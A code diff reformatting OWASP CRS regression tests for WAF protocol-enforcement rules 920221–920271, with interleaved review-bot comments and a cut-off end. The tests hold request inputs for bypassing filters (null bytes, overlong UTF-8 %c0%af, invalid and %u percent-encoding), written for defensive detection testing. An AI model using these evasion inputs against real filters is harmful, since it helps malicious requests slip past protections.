@@ -1,37 +1,34 @@ --- meta: author: "Max Leske, azurit" - enabled: true - name: "920221.yaml" description: "Detect invalid URI encoding in the last path segment of the URI" +rule_id: 920221 tests: - - test_title: 920221-1 + - test_id: 1 description: Detect invalid URI encoding in decoded URI (`%w20`) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get/%25w20" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920221\"" - - test_title: 920221-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get/%25w20" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920221\"" + - test_id: 2 description: Ignore invalid URI encoding if the last path segment looks like file name (`%w20`) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get/%25w20.txt" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920221\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get/%25w20.txt" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: "id \"920221\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml index 0c985df20..8b00df53d 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml 
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml 
@@ -1,43 +1,40 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920230.yaml" description: "Description" +rule_id: 920230 tests: - # From old modsec regression tests - test_title: 920230-1 + test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?parm=%25%37%33%25%36%46%25%36%44%25%36%35%25%37%34%25%36%35%25%37%38%25%37%34%25%35%46%25%33%31%25%33%32%25%33%33%25%33%34" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - log_contains: "id \"920230\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?parm=%25%37%33%25%36%46%25%36%44%25%36%35%25%37%34%25%36%35%25%37%38%25%37%34%25%35%46%25%33%31%25%33%32%25%33%33%25%33%34" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + log_contains: "id \"920230\"" - # From old modsec regression tests - test_title: 920230-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?parm=%7%6F%6D%65%74%65%78%74%5F%31%32%33%" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920230\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?parm=%7%6F%6D%65%74%65%78%74%5F%31%32%33%" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + no_log_contains: "id \"920230\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml index 9661f48a0..5197bca9a 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml 
@@ -1,135 +1,128 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920240.yaml" description: "Description" +rule_id: 920240 tests: - - test_title: 920240-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: 11 - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: "x=new %w20$" - stop_magic: true - version: "HTTP/1.1" - output: - log_contains: "id \"920240\"" - - test_title: 920240-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: 11 + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: "x=new %w20$" + stop_magic: true + version: "HTTP/1.1" + output: + log_contains: "id \"920240\"" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: 10 - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: "x=new %20$" - stop_magic: true - version: "HTTP/1.1" - output: - no_log_contains: "id \"920240\"" - - test_title: 920240-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: 10 + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: "x=new %20$" + stop_magic: true + version: "HTTP/1.1" + output: + 
no_log_contains: "id \"920240\"" + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: "param=value" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: "param=value" + version: "HTTP/1.1" + output: + no_log_contains: "id \"920240\"" - # We have a valid percent encoding here - test_title: 920240-4 + test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - Content-Type: "text/xml" - uri: "/" - data: | - - - - http://www.w3.org/2002/03/xkms#Pending - %1Gwww.attack.org - - - - version: "HTTP/1.1" - output: - no_log_contains: "id \"920240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + Content-Type: "text/xml" + uri: "/" + data: | + + + + http://www.w3.org/2002/03/xkms#Pending + %1Gwww.attack.org + + + + version: "HTTP/1.1" + output: + no_log_contains: "id \"920240\"" - # test 
URL Encoding Abuse Attack Attempt from old regression tests - test_title: 920240-5 + test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: "9" - uri: "/" - data: "param=%1G" - stop_magic: true - version: "HTTP/1.1" - output: - log_contains: "id \"920240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: "9" + uri: "/" + data: "param=%1G" + stop_magic: true + version: "HTTP/1.1" + output: + log_contains: "id \"920240\"" - # test URL Encoding Abuse Attack Attempt from old regression tests - test_title: 920240-6 + test_id: 6 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - Content-Type: "application/x-www-form-urlencoded" - uri: "/" - data: "param=%7%6F%6D%65%74%65%78%74%5F%31%32%33%" - version: "HTTP/1.1" - output: - log_contains: "id \"920240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + Content-Type: "application/x-www-form-urlencoded" + uri: "/" + data: "param=%7%6F%6D%65%74%65%78%74%5F%31%32%33%" + version: "HTTP/1.1" + output: + log_contains: "id \"920240\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml index 0f75ddbc8..f56ff48c6 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml 
@@ -1,80 +1,75 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920250.yaml" description: "Description" +rule_id: 920250 tests: - # crs-setup.conf needs to have CRS_VALIDATE_UTF8_ENCODING set # Taken from existing modsec regression - test_title: 920250-1 + test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?param=%c0%af" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - log_contains: "id \"920250\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?param=%c0%af" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + log_contains: "id \"920250\"" - # Taken from existing modsec regression - test_title: 920250-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?param=%c0" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - log_contains: "id \"920250\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?param=%c0" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + log_contains: "id 
\"920250\"" - # Taken from existing modsec regression - test_title: 920250-3 + test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?param=%F5%80%BF%BF" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - log_contains: "id \"920250\"" - - test_title: 920250-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?param=%F5%80%BF%BF" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + log_contains: "id \"920250\"" + - test_id: 4 desc: "Status Page Test - Invalid UTF-8 encoding: %C2%A3 is a valid Pound sign; %E2%A3 is invalid UTF-8 (incorrect starting binary sequence)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?param=%E2%A3" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - log_contains: "id \"920250\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?param=%E2%A3" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + log_contains: "id \"920250\"" 
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml
index dc65d1722..4d73eb74e 100644
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml
@@ -1,53 +1,49 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920260.yaml" description: "Description" +rule_id: 920260 tests: - - test_title: 920260-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=%uff0F" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920260\"" - - test_title: 920260-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=%uff0F" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920260\"" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=%u0F" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920260\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=%u0F" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: "id \"920260\"" - # Test taken from existing modsec regression - test_title: 920260-3 + test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?param=foo%uFF01" - version: "HTTP/1.0" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - output: - 
log_contains: "id \"920260\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?param=foo%uFF01" + version: "HTTP/1.0" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + output: + log_contains: "id \"920260\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml index a71ca8d3c..c9f7b3bd5 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml 
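Review bot: The rewritten `meta` block keeps the placeholder `description: "Description"` even though the commit already touches this block to add `rule_id: 920260`; a placeholder documents nothing, and the 921140 file in the same commit shows the intended use (`description: "Tests for protocol based attacks"`). Suggest `description: "Tests for rule 920260: %u-encoded characters in the query string"`, which is what the three test URIs (`%uff0F`, `%u0F`, `%uFF01`) exercise. The same placeholder is carried over unchanged in the 920270, 920271, 920272 and 920273 hunks of this commit, so it is worth fixing in one pass.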
@@ -1,141 +1,131 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920270.yaml" description: "Description" +rule_id: 920270 tests: - - test_title: 920270-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test%00=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920270\"" - - test_title: 920270-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test%00=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920270\"" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%00" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920270\"" - - test_title: 920270-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%00" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920270\"" + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test%00=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920270\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test%00=test1" + headers: + User-Agent: "OWASP CRS 
test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920270\"" - # This causes apache to error before it gets to CRS. Therefore # we'll mark this as a status 400 now until the FTW OR output is added - test_title: 920270-4 + test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost%00" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - status: 400 - # log_contains: "id \"920270\"" - - test_title: 920270-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost%00" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + status: 400 + # log_contains: "id \"920270\"" + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Referer: "anything%00" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920270\"" - - test_title: 920270-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Referer: "anything%00" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920270\"" + - test_id: 6 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test%40=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920270\"" - - test_title: 920270-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test%40=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: "id \"920270\"" + - test_id: 7 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test%FD=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920270\"" - - test_title: 920270-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test%FD=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: "id \"920270\"" + - test_id: 8 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test%FD=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920270\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test%FD=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: "id \"920270\"" - # Test converted from old tests - test_title: 920270-9 + test_id: 9 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 
- uri: "/?param=foo%00" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - log_contains: "id \"920270\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?param=foo%00" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + log_contains: "id \"920270\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml index bb265a1fe..ce37fa41d 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml 
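Review bot: Test 4 (`Host: "localhost%00"`) still asserts only `status: 400` with `# log_contains: "id \"920270\""` left commented out, so it passes whether or not rule 920270 ever sees the null byte in the Host header — a 400 from the web server on its own satisfies it, which is exactly the case the carried-over comment describes for Apache. If the new test format can express platform-specific expectations, the base test should assert `log_contains: "id \"920270\""` and the Apache-only 400 should live in an override; otherwise the comment should say that the assertion is deliberately weak so nobody reads a green run as proof the rule fires. Separately, tests 3 and 8 are byte-for-byte duplicates of tests 1 and 7 (`/?test%00=test1` and `/?test%FD=test1` with identical headers and expectations), so they add runtime without coverage.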
@@ -1,92 +1,85 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920271.yaml" description: "Description" +rule_id: 920271 tests: - - test_title: 920271-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%127" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920271\"" - - test_title: 920271-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%127" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920271\"" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%03" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920271\"" - - test_title: 920271-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%03" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920271\"" + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test%00=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920271\"" - - test_title: 920271-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test%00=test1" + headers: 
